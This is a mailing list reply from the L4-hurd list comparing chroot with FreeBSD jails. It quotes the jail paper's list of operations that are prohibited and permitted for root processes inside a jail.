[ams ]
> It is not true that "chroot is insecure on all platforms".
> All UNIXoid platforms. There are several ways to break out of a
> chroot on them.
> If you are looking for an alternative, one that works and is
> actually used around the world, have a look at BSD jails. They
> provide a more thorough encapsulation than chroot.
> BSD jails use chroot AFAIK.
Yes. Jail uses chroot. It also adds a lot of more restrictions and
is often used to confine larger subsystems. From [1]:
================================================================
Processes running with root privileges in the jail find that there are
serious restrictions on what it is capable of doing -- in particular,
activities that would extend outside of the jail:
+ Modifying the running kernel by direct access and loading kernel
modules is prohibited.
+ Modifying any of the network configuration, interfaces, addresses,
and routing table is prohibited.
+ Mounting and unmounting file systems is prohibited.
+ Creating device nodes is prohibited.
+ Accessing raw, divert, or routing sockets is prohibited.
+ Modifying kernel runtime parameters, such as most sysctl settings,
is prohibited.
+ Changing securelevel-related file flags is prohibited.
+ Accessing network resources not associated with the jail is
prohibited.
Other privileged activities are permitted as long as they are limited
to the scope of the jail:
+ Signalling any process within the jail is permitted.
+ Changing the ownership and mode of any file within the jail is
permitted, as long as the file flags permit this.
+ Deleting any file within the jail is permitted, as long as the file
flags permit this.
+ Binding reserved TCP and UDP port numbers on the jails IP address is
permitted. (Attempts to bind TCP and UDP ports using INADDR_ANY will
be redirected to the jails IP address.)
+ Functions which operate on the uid/gid space are all permitted since
they act as labels for filesystem objects of proceses which are
partitioned off by other mechanisms.
================================================================
In short, some of the most (AFAIK) most important features is that
jail prevents processes from accessing hardware directly, and it
prevents processes from binding to arbitrary IP addresses. In some
ways a jail is more akin to a Solaris Zone or a virtual machine.
eSk
[1] http://docs.freebsd.org/44doc/papers/jail/jail.ps.gz
_______________________________________________
L4-hurd mailing list
[email protected]
http://lists.gnu.org/mailman/listinfo/l4-hurd
